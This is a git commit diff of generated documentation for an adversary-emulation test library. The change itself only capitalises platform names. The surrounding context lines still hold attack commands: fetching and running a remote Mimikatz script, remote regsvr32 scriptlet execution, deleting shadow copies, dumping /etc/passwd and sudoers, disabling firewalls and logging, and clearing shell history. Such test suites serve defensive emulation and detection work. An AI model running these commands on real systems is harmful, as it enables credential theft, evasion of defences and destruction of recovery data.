Generate docs from job=validate_atomics_generate_docs branch=prettier-platform-markdown

2018-05-23 20:12:24 +00:00
parent e0d0b72bb9
commit 71c8d405c0
21 changed files with 63 additions and 64 deletions
@@ -24,7 +24,7 @@ Requires Network: No</blockquote>
 ## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
 TODO

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
@@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 ## Atomic Test #2 - Compress Data for Exfiltration With Rar
 TODO

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `powershell`!
@@ -153,7 +153,7 @@ Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>
 ## Atomic Test #1 - Powershell Mimikatz
 Dumps Credentials via Powershell by invoking a remote mimikatz script

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
@@ -171,7 +171,7 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
 ## Atomic Test #2 - Gsecdump
 https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -184,7 +184,7 @@ gsecdump -a
 ## Atomic Test #3 - Windows Credential Editor
 http://www.ampliasecurity.com/research/windows-credentials-editor/

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -198,7 +198,7 @@ wce -o #{output_file}
 Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated 
 via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -22,7 +22,7 @@ Permissions Required: User, Administrator, SYSTEM</blockquote>
 ## Atomic Test #1 - Scan a bunch of ports to see if they are open
 xxx

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -46,7 +46,7 @@ Contributors: Travis Smith, Tripwire</blockquote>
 ## Atomic Test #1 - List all accounts
 xxx

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -64,7 +64,7 @@ cat /etc/passwd > #{output_file}
 ## Atomic Test #2 - View sudoers access
 xxx (requires root)

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -82,7 +82,7 @@ cat /etc/sudoers > #{output_file}
 ## Atomic Test #3 - View accounts with UID 0
 xxx

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -100,7 +100,7 @@ grep 'x:0:' /etc/passwd > #{output_file}
 ## Atomic Test #4 - List opened files by user
 xxx

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -113,7 +113,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
 ## Atomic Test #5 - Show if a user account has ever logger in remotely
 xxx

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -26,7 +26,7 @@ Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems
 ## Atomic Test #1 - Disable iptables firewall
 Disables the iptables firewall

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -48,7 +48,7 @@ fi
 ## Atomic Test #2 - Disable syslog
 Disables syslog collection

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -68,7 +68,7 @@ fi
 ## Atomic Test #3 - Disable Cb Response
 Disable the Cb Response service

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -88,7 +88,7 @@ fi
 ## Atomic Test #4 - Disable SELinux
 Disables SELinux enforcement

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -26,7 +26,7 @@ Permissions Required: User, Administrator, SYSTEM</blockquote>
 ## Atomic Test #1 - Set a file's access timestamp
 Stomps on the access timestamp of a file

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -44,7 +44,7 @@ touch -a -t 197001010000.00 #{target_filename}
 ## Atomic Test #2 - Set a file's modification timestamp
 Stomps on the modification timestamp of a file

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -65,7 +65,7 @@ Stomps on the create timestamp of a file
 Setting the creation timestamp requires changing the system clock and reverting.
 Sudo or root privileges are required to change date. Use with caution.

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -26,7 +26,7 @@ Requires Network: Yes</blockquote>
 ## Atomic Test #1 - xxxx
 xxxx

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `bash`!
@@ -50,7 +50,7 @@ Contributors: Walker Johnson</blockquote>
 ## Atomic Test #1 - Victim configuration
 Create a temporary directory and several files on the victim system for later deletion

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -66,7 +66,7 @@ echo "This file will be shredded" > /tmp/victim-shred.txt
 ## Atomic Test #2 - Delete a single file
 Delete a single file from the temporary directory

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -79,7 +79,7 @@ rm -f /tmp/victim-files/a
 ## Atomic Test #3 - Delete an entire folder
 Recursively delete the temporary directory and all files contained within it

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -92,7 +92,7 @@ rm -rf /tmp/victim-files
 ## Atomic Test #4 - Overwrite and delete a file with shred
 Use the `shred` command to overwrite the temporary file and then delete it

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -105,7 +105,7 @@ shred -u /tmp/victim-shred.txt
 ## Atomic Test #5 - Victim configuration
 Create a temporary directory and several files on the victim system for later deletion

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -135,7 +135,7 @@ type nul > g
 ## Atomic Test #6 - Delete a single file - cmd
 Delete a single file from the temporary directory using cmd.exe

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -148,7 +148,7 @@ del /f %TEMP%\victim-files-cmd\a
 ## Atomic Test #7 - Delete an entire folder - cmd
 Recursively delete the temporary directory and all files contained within it using cmd.exe

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -161,7 +161,7 @@ del /f /S %TEMP%\victim-files-cmd
 ## Atomic Test #8 - Delete a single file - ps
 Delete a single file from the temporary directory using Powershell

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `powershell`!
@@ -174,7 +174,7 @@ Remove-Item -path %TEMP%\victim-files-ps\a
 ## Atomic Test #9 - Delete an entire folder - ps
 Recursively delete the temporary directory and all files contained within it using Powershell

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `powershell`!
@@ -187,7 +187,7 @@ Remove-Item -path %TEMP%\victim-files-ps -recurse
 ## Atomic Test #10 - Delete VSS - vssadmin
 Delete all volume shadow copies with vssadmin.exe

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -200,7 +200,7 @@ vssadmin.exe Delete Shadows /All /Quiet
 ## Atomic Test #11 - Delete VSS - wmic
 Delete all volume shadow copies with wmic

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -213,7 +213,7 @@ wmic shadowcopy delete
 ## Atomic Test #12 - bcdedit
 xxx

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -227,7 +227,7 @@ bcdedit /set {default} recoveryenabled no
 ## Atomic Test #13 - wbadmin
 xxx

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -32,7 +32,7 @@ Contributors: John Strand</blockquote>
 ## Atomic Test #1 - Brute Force Credentials
 Creates username and password files then attempts to brute force on remote host

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
@@ -32,7 +32,7 @@ Data Sources: API monitoring, Process monitoring, File monitoring</blockquote>
 ## Atomic Test #1 - Screencapture
 Use screencapture command to collect a full desktop screenshot

-**Supported Platforms:** macos
+**Supported Platforms:** macOS


 #### Inputs
@@ -51,7 +51,7 @@ screencapture
 ## Atomic Test #2 - Screencapture (silent)
 Use screencapture command to collect a full desktop screenshot

-**Supported Platforms:** macos
+**Supported Platforms:** macOS


 #### Inputs
@@ -70,7 +70,7 @@ screencapture -x
 ## Atomic Test #3 - X Windows Capture
 Use xwd command to collect a full desktop screenshot and review file with xwud

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Inputs
@@ -90,7 +90,7 @@ xwud -in #{output_file}
 ## Atomic Test #4 - Import
 Use import command to collect a full desktop screenshot

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Inputs
@@ -28,7 +28,7 @@ Data Sources: API monitoring</blockquote>
 ## Atomic Test #1 - Utilize Clipboard to store or execute commands from
 Add data to clipboard to copy off or execute commands from.

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -42,7 +42,7 @@ clip < readme.txt
 ## Atomic Test #2 - PowerShell
 Utilize PowerShell to echo a command to clipboard and execute it

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `powershell`!
@@ -36,7 +36,7 @@ Contributors: Casey Smith</blockquote>
 ## Atomic Test #1 - Regsvr32 local COM scriptlet execution
 Regsvr32.exe is a command-line program used to register and unregister OLE controls

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
@@ -54,7 +54,7 @@ regsvr32.exe /s /u /i:#{filename} scrobj.dll
 ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
 Regsvr32.exe is a command-line program used to register and unregister OLE controls

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
@@ -72,7 +72,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll
 ## Atomic Test #3 - Regsvr32 local DLL execution
 Regsvr32.exe is a command-line program used to register and unregister OLE controls

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
@@ -26,7 +26,7 @@ Permissions Required: User</blockquote>
 ## Atomic Test #1 - SourceRecorder via Windows command prompt
 Create a file called test.wma, with the duration of 30 seconds

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
@@ -45,7 +45,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
 ## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt
 [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Run it with `command_prompt`!
@@ -64,17 +64,16 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward</blockquote>
 ## Atomic Test #1 - MSBuild Bypass Using Inline Tasks
 Executes the code in a project file using. C# Example

-**Supported Platforms:** windows
+**Supported Platforms:** Windows


 #### Inputs
 | Name | Description | Type | Default Value | 
-|-------------------------------------------|
-    | filename | Location of the project file | Path | T1127.csproj|
+|------|-------------|------|---------------|
+| filename | Location of the project file | Path | T1127.csproj|

 #### Run it with `command_prompt`!
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe T1127.csproj
-
 ```
 <br/>
@@ -42,7 +42,7 @@ Contributors: Itzik Kotler, SafeBreach, Travis Smith, Tripwire, Red Canary, Matt
 ## Atomic Test #1 - Install root CA on CentOS/RHEL
 Creates a root CA with openssl

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -24,7 +24,7 @@ Permissions Required: Administrator</blockquote>
 ## Atomic Test #1 - Create a user account on a Linux system
 Create a user via useradd

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Inputs
@@ -43,7 +43,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
 ## Atomic Test #2 - Create a user account on a MacOS system
 Creates a user on a MacOS system with dscl

-**Supported Platforms:** macos
+**Supported Platforms:** macOS


 #### Run it with `bash`!
@@ -20,7 +20,7 @@ Permissions Required: User</blockquote>
 ## Atomic Test #1 - xxxx
 xxxx

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -32,7 +32,7 @@ Permissions Required: User</blockquote>
 ## Atomic Test #1 - Clear Bash history (rm)
 Clears bash history via rm

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -45,7 +45,7 @@ rm ~/.bash_history
 ## Atomic Test #2 - Clear Bash history (echo)
 Clears bash history via rm

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -58,7 +58,7 @@ echo "" > ~/.bash_history
 ## Atomic Test #3 - Clear Bash history (cat dev/null)
 Clears bash history via cat /dev/null

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -71,7 +71,7 @@ cat /dev/null > ~/.bash_history
 ## Atomic Test #4 - Clear Bash history (ln dev/null)
 Clears bash history via a symlink to /dev/null

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -84,7 +84,7 @@ ln -sf /dev/null ~/.bash_history
 ## Atomic Test #5 - Clear Bash history (truncate)
 Clears bash history via truncate

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -97,7 +97,7 @@ truncate -s0 ~/.bash_history
 ## Atomic Test #6 - Clear history of a bunch of shells
 Clears the history of a bunch of different shell types by setting the history size to zero

-**Supported Platforms:** linux
+**Supported Platforms:** Linux


 #### Run it with `sh`!
@@ -22,7 +22,7 @@ Permissions Required: User</blockquote>
 ## Atomic Test #1 - Disable history collection
 Disables history collection in shells

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Inputs
@@ -37,7 +37,7 @@ Permissions Required: User</blockquote>
 ## Atomic Test #1 - Create a hidden file in a hidden directory
 Creates a hidden file inside a hidden directory

-**Supported Platforms:** linux, macos
+**Supported Platforms:** Linux, macOS


 #### Run it with `sh`!
@@ -30,7 +30,7 @@ Contributors: Justin Warner, ICEBRG</blockquote>
 ## Atomic Test #1 - Chrome (Developer Mode)
 xxx

-**Supported Platforms:** linux, windows, macos
+**Supported Platforms:** Linux, Windows, macOS


 #### Run it with these steps!
@@ -49,7 +49,7 @@ tick 'Developer Mode'.
 ## Atomic Test #2 - Chrome (Chrome Web Store)
 xxx

-**Supported Platforms:** linux, windows, macos
+**Supported Platforms:** Linux, Windows, macOS


 #### Run it with these steps!
@@ -65,7 +65,7 @@ in Chrome
 ## Atomic Test #3 - Firefox
 Create a file called test.wma, with the duration of 30 seconds

-**Supported Platforms:** linux, windows, macos
+**Supported Platforms:** Linux, Windows, macOS


 #### Run it with these steps!